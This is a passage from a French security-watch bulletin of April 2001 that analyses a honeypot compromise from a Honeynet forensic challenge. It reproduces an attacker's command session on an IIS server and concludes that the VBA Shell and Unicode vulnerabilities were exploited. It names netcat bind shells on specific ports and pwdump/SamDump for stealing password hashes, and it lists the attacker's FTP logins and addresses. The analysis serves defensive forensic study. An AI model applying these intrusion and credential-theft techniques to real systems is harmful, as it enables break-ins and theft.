12/15/00 06:36p 2,526 void.gif<br />
12/15/00 06:36p 1,213 whisker.gif<br />
12/15/00 06:36p 1,161 win2k.gif<br />
12/07/00 03:37p _private<br />
12/07/00 03:37p 1,759 _vti_inf.html<br />
24 File(s) 42,769 bytes<br />
1,690,259,968 bytes free<br />
C:\InetPub\wwwroot>w<br />
The name specified is not recognized as an<br />
internal or external command, operable program or batch<br />
file.<br />
C:\InetPub\wwwroot>cd ..<br />
C:\InetPub>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\InetPub<br />
12/07/00 03:30p .<br />
12/07/00 03:30p ..<br />
11/26/00 12:40p ftproot<br />
11/26/00 12:40p gophroot<br />
12/07/00 03:31p iissamples<br />
11/26/00 12:40p scripts<br />
02/04/01 07:33a wwwroot<br />
7 File(s) 0 bytes<br />
1,690,259,968 bytes free<br />
C:\InetPub>cd ..<br />
C:\>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\<br />
11/26/00 12:34p 0 AUTOEXEC.BAT<br />
11/26/00 06:57p 322 boot.ini<br />
11/26/00 12:34p 0 CONFIG.SYS<br />
12/26/00 07:36p exploits<br />
02/04/01 07:07a 5,327 har.txt<br />
12/07/00 03:30p InetPub<br />
12/07/00 03:12p Multimedia Files<br />
12/26/00 07:10p New Folder<br />
01/26/01 02:10p 78,643,200 pagefile.sys<br />
12/21/00 08:59p Program Files<br />
02/04/01 06:49a 69 README.NOW.Hax0r<br />
02/04/01 07:23a 38 rfp.txt<br />
12/21/00 08:59p TEMP<br />
02/04/01 07:22a test<br />
02/04/01 07:34a WINNT<br />
12/26/00 07:09p wiretrip<br />
02/04/01 06:43a 0 yay.txt<br />
17 File(s) 78,648,956 bytes<br />
1,690,259,968 bytes free<br />
C:\>crmdir test<br />
The name specified is not recognized as an internal<br />
or external command, operable program or batchfile.<br />
C:\>rmdir test<br />
C:\>cd inetpub/wwwroot<br />
C:\InetPub>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\InetPub<br />
12/07/00 03:30p .<br />
12/07/00 03:30p ..<br />
11/26/00 12:40p ftproot<br />
11/26/00 12:40p gophroot<br />
12/07/00 03:31p iissamples<br />
11/26/00 12:40p scripts<br />
02/04/01 07:33a wwwroot<br />
7 File(s) 0 bytes<br />
1,690,259,968 bytes free<br />
C:\InetPub>cd wwwroot<br />
C:\InetPub\wwwroot>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\InetPub\wwwroot<br />
02/04/01 07:33a .<br />
02/04/01 07:33a ..<br />
12/07/00 03:37p cgi-bin<br />
12/07/00 03:37p 4,663 default.asp<br />
12/15/00 10:26p 1,233 default.htm<br />
12/07/00 03:37p 4,325 default.htm.org<br />
12/15/00 09:15p guest<br />
12/07/00 03:37p images<br />
12/15/00 06:36p 709 lrfpbot.gif<br />
12/15/00 07:05p 673 lrfptop.gif<br />
12/15/00 06:36p 1,422 nmrc.gif<br />
12/07/00 03:37p 2,504 postinfo.html<br />
12/15/00 06:36p 968 rfp.gif<br />
12/15/00 06:36p 8,606 rfpback.gif<br />
12/15/00 06:36p 8,606 rfpback1.gif<br />
11/26/00 12:40p samples<br />
12/15/00 06:36p 1,624 sf.gif<br />
12/15/00 06:36p 756 technotronic.gif<br />
02/04/01 07:34a 21 test.txt<br />
12/15/00 06:36p 2,526 void.gif<br />
12/15/00 06:36p 1,213 whisker.gif<br />
12/15/00 06:36p 1,161 win2k.gif<br />
12/07/00 03:37p _private<br />
12/07/00 03:37p 1,759 _vti_inf.html<br />
24 File(s) 42,769 bytes<br />
1,690,259,968 bytes free<br />
C:\InetPub\wwwroot>copy default.htm default.html<br />
1 file(s) copied.<br />
C:\InetPub\wwwroot>echo . >>default.htm<br />
C:\InetPub\wwwroot>cd ..<br />
C:\InetPub>cd ..<br />
C:\>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\<br />
11/26/00 12:34p 0 AUTOEXEC.BAT<br />
11/26/00 06:57p 322 boot.ini<br />
11/26/00 12:34p 0 CONFIG.SYS<br />
12/26/00 07:36p exploits<br />
02/04/01 07:07a 5,327 har.txt<br />
12/07/00 03:30p InetPub<br />
12/07/00 03:12p Multimedia Files<br />
12/26/00 07:10p New Folder<br />
01/26/01 02:10p 78,643,200 pagefile.sys<br />
12/21/00 08:59p Program Files<br />
02/04/01 06:49a 69 README.NOW.Hax0r<br />
02/04/01 07:23a 38 rfp.txt<br />
12/21/00 08:59p TEMP<br />
02/04/01 07:34a WINNT<br />
12/26/00 07:09p wiretrip<br />
02/04/01 06:43a 0 yay.txt<br />
16 File(s) 78,648,956 bytes<br />
1,690,258,432 bytes free<br />
C:\>exit<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 58/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Avril 2001<br />
Conclusion<br />
1. Deux vagues d'attaques peuvent être identifiées dont tout laisse à penser qu'elles sont le fait de deux<br />
individus distincts, le second exploitant involontairement un accès laissé ouvert par le premier ! En effet, l'étude<br />
des deux sessions montre un changement des caractéristiques, de la signature pourrait-on dire, de l'attaque. De<br />
plus, l'auteur de la seconde attaque semble complétement ignorer l'origine et le contenu des fichiers déposés<br />
durant l'attaque précédente. Les messages laissés sur le système vont d'ailleurs dans ce sens.<br />
L'auteur de la première attaque ne remarque rien et signe son exploit, alors que son 'successeur' annonce avoir<br />
découvert le 'pot aux roses'. A ce propos, aucun élement ne semble permettre de conclure quant à la présence<br />
d'un système piégé … sauf la présence des fichiers résultants de la première attaque et l'existence d'une porte<br />
dérobée. Le second attaquant en aurait-il conclu qu'il s'agissait là d'un piège, car trop évident ?<br />
Notons que les auteurs du défi précisent: We have reason to believe that the attacker knew this was a honeypot,<br />
however we decided to release this challenge as it examplifies the most common of NT attacks found in the wild<br />
laissant entendre que l'attaque n'est le fait que d'un unique individu …<br />
2. Deux vulnérabilités sont exploitées successivement pour ouvrir un accès dérobé sur le système<br />
3.<br />
attaqué: 'VBA Shell' [Paquets 0037-0991] puis 'UNICODE' [Paquets 0992-5769]<br />
Les actions sont enchaînées via un script édité au fil de l'eau, les résultats étant supervisées en temps<br />
réel, comme le montrent les innombrables erreurs commises.<br />
4. Le premier attaquant dispose de comptes 'ftp' sur trois sites Internet<br />
- johna2k/hacker2000 sur www.nether.net [Paquets 0308-323]<br />
- johna2k/haxedj00 sur 1Cust162.tnt13.stk3.da.uu.net (213.116.251.162) [Paquets 0528-530]<br />
- johna2k/hacker2000 sur freedu-12-26.libertysurf.se (212.139.12.26) [Paquets 0528- … ]<br />
L'analyse du nom '1Cust162.tnt13.stk3.da.uu.net' révèle qu'il s'agit d'un point d'accès (da: Dial Access)<br />
UUNET probablement localisé sur Stockholm (stk: StockHolm). Cette localisation est corroborée par l'existence<br />
d'un second site lui aussi localisé en Suède: freedu-12-26.libertysurf.se. En pratique, l'adresse utilisée est<br />
dynamique, et seule une collaboration avec UUNET et LIBERTYSURF permettra de remonter à l'identité du<br />
propriétaire du système. La bannière d'en-tête du service ftp n'apporte pas grande information.<br />
220-Serv-U FTP-Server v2.5h for WinSock ready...<br />
220--------H-A-C-K T-H-E P-L-A-N-E-T--------<br />
220-W3|_c0m3 T0 JohnA's 0d4y Ef-Tee-Pee S3rv3r.<br />
220-Featuring 100% elite hax0r warez!@$#@<br />
(welcome to johnA's oday ftp server)<br />
220-Im running win 95 (Release candidate 1), on a p33, with 16mb Ram.<br />
220 -------H-A-C-K T-H-E P-L-A-N-E-T--------<br />
5. Ces comptes 'ftp' sont utilisés comme support de stockage de différents utilitaires:<br />
- Netcat (ou nc.exe) utilisé comme service d'accès un interpréteur de commande sur les ports TCP/6868 [Paquet<br />
4234], TCP/6968 [Paquets 3743,4224], TCP/6969 [Paquets 1234,3662,5458]<br />
- Pdump dont on supposer qu'il s'agit d'une adaptation de l'utilitaire pwdump permettant d'acquérir les mots de<br />
passe du système<br />
- SamDump.dll dont le nom laisse entendre qu'il s'agit d'une librairie dynamique destinée à copier le contenu de<br />
l'annuaire de sécurité SAM,<br />
Le défi N°14 démontre non seulement la difficulté rencontrée pour suivre une seule attaque dans un environnement<br />
pourtant peu bruité (3 à 4 connexions licites et peu actives durant l'attaque) mais surtout la complexité de la<br />
détermination des liens de cause à effet en cas de pluralité des sources. Il prouve la nécessité de pouvoir disposer<br />
d'une information 'native' dans un format normalisée et susceptible d'être traitée selon différents critères d'analyse.<br />
Complément d’information<br />
Http://project.honeynet.org/scans/scan14/<br />
Http://www.silicondefense.com/software/snortsnarf/<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 59/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE